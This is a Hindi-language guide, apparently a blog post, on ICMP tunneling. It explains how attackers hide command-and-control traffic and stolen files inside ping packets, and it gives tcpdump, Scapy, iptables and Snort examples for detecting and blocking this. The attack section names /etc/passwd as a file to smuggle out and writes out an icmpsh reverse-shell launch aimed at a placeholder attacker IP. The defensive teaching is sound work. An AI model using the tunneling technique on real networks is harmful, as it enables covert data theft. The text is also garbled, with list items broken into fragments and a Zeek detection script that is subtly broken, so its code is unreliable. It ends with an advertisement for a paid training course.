
ICMP टनलिंग, जिसे कभी-कभी "गुप्त पिंग-आधारित हमले" कहा जाता है, एक गुप्त नेटवर्क हमला तकनीक है जहां दुर्भावनापूर्ण अभिनेता कमांड-और-कंट्रोल (C2) ट्रैफ़िक या डेटा के एक्सफ़िलट्रेशन गतिविधियों को अन्यथा साधारण इंटरनेट कंट्रोल संदेश प्रोटोकॉल (ICMP) पैकेटों के अंदर छिपाते हैं। चूंकि ICMP—जो कि आमतौर पर ping अनुरोधों के लिए जाना जाता है—आमतौर पर फ़ायरवॉल और घुसपैठ पहचान प्रणाली की नज़रों में नहीं आता, यह आईटी सुरक्षा टीमों के लिए एक गंभीर चुनौती प्रस्तुत करता है।
इस गाइड में, हम बताएंगे कि ICMP टनलिंग क्या है, हमलावर इसे कैसे लागू करते हैं, यह छुपाने की विधि क्यों आकर्षक है, और—सबसे महत्वपूर्ण—सुरक्षा पेशेवर और नेटवर्क एडमिनिस्ट्रेटर इसे कैसे पहचान सकते हैं और ICMP टनल हमलों के खिलाफ रक्षा कर सकते हैं। हम शुरुआती समझ से लेकर उन्नत पहचान तक जाएंगे, जिसमें वास्तविक दुनिया के उदाहरण और कोड नमूने शामिल होंगे, जो ICMP टनलिंग गतिविधि के लिए नेटवर्क ट्रैफ़िक को स्कैन, मॉनिटर और पार्स करने के लिए होंगे।
इंटरनेट कंट्रोल मैसेज प्रोटोकॉल (ICMP) इंटरनेट प्रोटोकॉल सूट का एक मौलिक हिस्सा है। इसे त्रुटि संदेशों, नेटवर्क डायग्नोस्टिक्स, और स्थिति संदेशों के लिए डिज़ाइन किया गया है।
मुख्य तथ्य:
ping), गंतव्य अप्राप्य, समय समाप्त, और अन्य शामिल हैं।ping, traceroute), नेटवर्क उपकरणों के बीच त्रुटि रिपोर्टिंग।जब आप इसे जारी करते हैं:
ping google.com
आपका कंप्यूटर ICMP इको अनुरोध पैकेटों की एक श्रृंखला उत्पन्न करता है, और Google (यदि यह पिंग की अनुमति देता है) ICMP इको उत्तर पैकेटों के साथ प्रतिक्रिया करता है।
ICMP टनलिंग एक तकनीक है जो ICMP पैकेटों के अंदर मनमाना पेलोड डेटा समाहित करती है। इस डेटा में निकालरहित की जा रही फाइलें, शेल कमांड, या यहां तक कि एक पूरा TCP कनेक्शन शामिल हो सकता है, सभी आम तौर पर सामान्य दिखने वाले पिंग अनुरोधों या उत्तरों के अंदर छिपे होते हैं।
क्योंकि संगठन अक्सर अपने परिधि फ़ायरवॉल के माध्यम से वैध समस्या निवारण के लिए ICMP ट्रैफ़िक की अनुमति देते हैं, हमलावर इस विश्वास का फायदा उठाते हैं ताकि छिपे हुए डेटा को पारित किया जा सके या नेटवर्क में बैकडोर बनाए जा सकें।
परिभाषा:
ICMP टनलिंग एक गुप्त संचार विधि है जहां हमलावर ICMP पैकेटों के भीतर दुर्भावनापूर्ण या अनधिकृत डेटा को एनकोड करते हैं ताकि नेटवर्क एक्सेस नियंत्रण को बायपास किया जा सके।
ICMP टनलिंग ICMP पैकेटों की संरचना—खासकर इको अनुरोध/उत्तर—का उपयोग करके अतिरिक्त, छिपा हुआ डेटा ले जाने के लिए करती है।
icmpsh, ptunnel, या कस्टम स्क्रिप्ट जैसे उपकरणों का उपयोग करता है।एक सामान्य ICMP इको अनुरोध पैकेट कैसा दिख सकता है:
| फ़ील्ड | उदाहरण मूल्य |
|---|---|
| प्रकार | 8 (इको अनुरोध) |
| कोड | 0 |
| चेकसम | 6920 |
| पहचानकर्ता | 13 |
| अनुक्रम संख्या | 250 |
| डेटा | "हैलो, वर्ल्ड!" |
एक ICMP टनलिंग हमला बेस64-एनकोडेड निकाला गया डेटा "डेटा" सेक्शन में रख सकता है।
फ़ायरवॉल आमतौर पर बाहरी कनेक्शनों को रोकता है (जैसे, आउटबाउंड SSH, HTTP/S के माध्यम से डेटा निकासी)।
हालाँकि, ICMP अक्सर नेटवर्क समस्या निवारण को सक्षम करने के लिए श्वेत सूचीबद्ध होता है, यहां तक कि संगठनात्मक सीमाओं के पार भी।
उन्नत निरंतर खतरा (APT) अभिनेताओं ICMP टनलों का उपयोग समझौता किए गए होस्ट्स को प्रबंधिन करने, कमांड भेजने और फ़ाइलें निकालने के लिए करते हैं—सभी सामान्य नेटवर्क अलर्ट को उठाए बिना।
ICMP टनलिंग का समर्थन करने वाला एक संग्रह का उपयुक्त सुरक्षा उपकरणों की श्रंखला:
एक अंदरूनी खतरा या कार्यस्थल पर मालवेयर संगठन के बाहर संवेदनशील फ़ाइलों को तस्करी करना चाहता है।
चरण:
/etc/passwd) विभाजित होती हैं, एनकोड होती हैं, और कई इको अनुरोधों के अंदर छिपती हैं।पेनेट्रेशन टेस्टर्स और हमलावर icmpsh जैसे उपकरणों का प्रक्षेपण करते हैं:
icmpsh -t <attacker_ip> लॉन्च करता है।APT और मालवेयर (विशेष रूप से Backdoor.Win32.ICMPdoor) के ICMP टनलिंग का उपयोग कर हाई-सिक्योरिटी वातावरण में संदृश्य पहुँच के लिए रिपोर्ट्स सामने आई हैं जहां अन्यथा HTTP/HTTPS को छोड़ सभी आउटबाउंड ब्लॉक कर दिए जाते हैं—और ICMP।
ICMP टनलिंग की पहचान एनआईसी पैकेट पेलोड की जांच या असामान्य पैटर्न की पहचान पर निर्भर करती है।
ICMP ट्रैफ़िक का निरीक्षण करने के लिए अक्सर उपयोग किया जाने वाला पैकेट कैप्चर टूल।
# सभी ICMP ट्रैफ़िक कैप्चर करें, विस्तृत आउटपुट
sudo tcpdump -n -v icmp
उदाहरणतः संदिग्ध आउटपुट (छोटा):
IP 10.10.10.5 > 203.0.113.10: ICMP echo request, id 4567, seq 3344, length 1024
नोट: 1024बाइट्स सामान्य पिंग ICMP पेलोड्स से बहुत बड़ा है!
एक ग्राफिकल पैकेट विश्लेषक।
icmpबुद्धिमान ICMP स्क्रिप्टिंग के साथ एक शक्तिशाली नेटवर्क सुरक्षा मॉनिटरिंग टूल।
असामान्य ICMP पेललोड्स लॉग करने के लिए स्क्रिप्ट:
event icmp_message(c: connection, icmp: icmp_hdr)
{
if ( c$id$orig_h !in Site::internal_networks )
{
# लॉग या बड़े पेललोड्स पर अलर्ट
if ( c$payload && |c$payload| > 500 )
local alert = fmt("Large ICMP payload from %s to %s", c$id$orig_h, c$id$resp_h);
}
}
Bash उदाहरण: सभी आउटबाउंड पिंग पेललोड्स को लॉग करें।
sudo tcpdump -nn -X icmp and host 203.0.113.10 | grep -A 10 "ICMP"
Python उदाहरण: असामान्य ICMP payloads के लिए pcap पार्स करें
from scapy.all import *
def scan_icmp_pcap(pcap_file):
packets = rdpcap(pcap_file)
for pkt in packets:
if pkt.haslayer(ICMP):
if len(pkt[ICMP].payload) > 100:
print(f"Suspicious ICMP from {pkt[IP].src} to {pkt[IP].dst}: {bytes(pkt[ICMP].payload)[:30]}...")
scan_icmp_pcap('capture.pcap')
ICMP टनल का दुरुपयोग खोजने के लिए सक्रिय रूप से स्कैन और असामान्यता पहचान महत्वपूर्ण है।
ELK stack, Zeek, Wireshark जैसे उपकरणों का उपयोग करें:
वास्तविक समय में सबसे बड़े ICMP पैकेट्स को खोजें:
sudo tcpdump -ni eth0 icmp and greater 200
डंप से पैकेट आकार सूचीबद्ध करें:
sudo tcpdump -nn -r capture.pcap icmp | awk '{print $NF}' | sort | uniq -c | sort -nr
Python Scapy: बड़े पेललोड्स के साथ इको अनुरोधों की रिपोर्ट करें
from scapy.all import *
def detect_large_icmp(pcap_file):
for pkt in rdpcap(pcap_file):
if pkt.haslayer(ICMP) and pkt[ICMP].type == 8:
if len(pkt[ICMP].payload) > 200:
print(f"Large ICMP Echo Request: {pkt[IP].src} -> {pkt[IP].dst}, size={len(pkt[ICMP].payload)}")
detect_large_icmp("icmp_traf.pcap")
उदाहरण: iptables के साथ आउटबाउंड ICMP को ब्लॉक करें
sudo iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP
Snort नियम उदाहरण:
alert icmp any any -> any any (msg:"Suspicious ICMP Payload Size"; dsize:>200; sid:1000001; rev:1;)
अनुसंधान ने दिखाया है कि स्टेटलेस मॉनिटरिंग—ICMP पैकेटों के आकर और आवृत्ति की निगरानी करना, न कि सिर्फ उनकी स्थिति या अनुक्रम को—टनलिंग का पता लगाने का कम भार और मापनीय तरीका हो सकता है।
सिंह और नॉर्डस्ट्रॉम के अनुसार, स्टेटलेस मॉडल बिना बड़े होस्ट्स या राउटर्स पर प्रदर्शन के बिना गुप्त चैनलों को प्रभावी रूप से ध्वजांकित कर सकते हैं—even at scale.
ICMP टनलिंग एक धीमी और गुप्त खतरा है जो वैध नेटवर्क संचालन में सहजता से मिल जाता है, जिससे इसे पहचानना और बचाव करना नीली टीमों के लिए चुनौतीपूर्ण हो जाता है। डायग्नोस्टिक्स के लिए ICMP के व्यापक उपयोग और संगठनों द्वारा फायरवॉल के माध्यम से ऐसे ट्रैफ़िक की अनुमति देने की आवृत्ति के साथ, यह हमलावरों के लिए गुप्त कमांड और कंट्रोल स्थापित करने, संवेदनशील डेटा को निकालने, या समझौता किए गए होस्ट्स तक पहुँचने के लिए एक पसंदीदा वाहन है।
अपने नेटवर्क के वैध ICMP गतिविधि के आधारभूत की स्थापना और हस्ताक्षर और असामान्यता-आधारित दोनों पहचान का उपयोग करके, आपका संगठन इस गुप्त खतरा वेक्टर को डेटा हानि या आगे के समझौते के परिणाम के पहले निरस्त कर सकता है।
अपनी परिधि को सुरक्षित करें—और कभी भी साधारण पिंग को अनदेखा न करें!
यदि आपको यह सामग्री मूल्यवान लगी, तो कल्पना कीजिए कि आप हमारे व्यापक 47-सप्ताह के विशिष्ट प्रशिक्षण कार्यक्रम के साथ क्या हासिल कर सकते हैं। 1,200+ से अधिक छात्रों से जुड़ें जिन्होंने यूनिट 8200 तकनीकों के साथ अपने करियर को बदल दिया है।